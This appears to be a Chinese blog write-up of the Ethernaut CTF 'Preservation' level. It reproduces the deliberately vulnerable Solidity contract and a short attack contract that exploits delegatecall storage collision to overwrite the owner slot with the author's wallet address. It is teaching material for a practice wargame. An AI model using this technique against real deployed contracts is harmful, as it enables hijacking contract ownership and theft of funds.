16.Preservation
2023-06-23 20:21:59 # 04.Ethernaut CTF

Preservation

题目

目标:将owner修改为我们的钱包地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract Preservation {

// public library contracts
address public timeZone1Library;
address public timeZone2Library;
address public owner;
uint storedTime;
// Sets the function signature for delegatecall
bytes4 constant setTimeSignature = bytes4(keccak256("setTime(uint256)"));

constructor(address _timeZone1LibraryAddress, address _timeZone2LibraryAddress) {
timeZone1Library = _timeZone1LibraryAddress;
timeZone2Library = _timeZone2LibraryAddress;
owner = msg.sender;
}

// set the time for timezone 1
function setFirstTime(uint _timeStamp) public {
timeZone1Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
}

// set the time for timezone 2
function setSecondTime(uint _timeStamp) public {
timeZone2Library.delegatecall(abi.encodePacked(setTimeSignature, _timeStamp));
}
}

// Simple library contract to set the time
contract LibraryContract {

// stores a timestamp
uint storedTime;

function setTime(uint _time) public {
storedTime = _time;
}
}

分析

本题和之前遇到其中一题原理一样,不做多阐述,见本博客文章[security-14]

交易的时候调高gas,否则交易会失败

攻击合约

1
2
3
4
5
6
7
8
9
10
11
contract attack {
address public timeZone1Library;
address public timeZone2Library;
address public owner;

function setTime(uint _time) public {
//形参_time没用到,只是为了函数选择器一致才这么设置的
//直接将owner设置为我们的钱包地址,没用到_time
owner = address(0xd3E65149C212902749D49011B6ab24bba30D97c6);
}
}

做题

获取实例,做题

image-20221224171028921

image-20221224171046536

再次调用

image-20221224171053790

通过

image-20221224170655355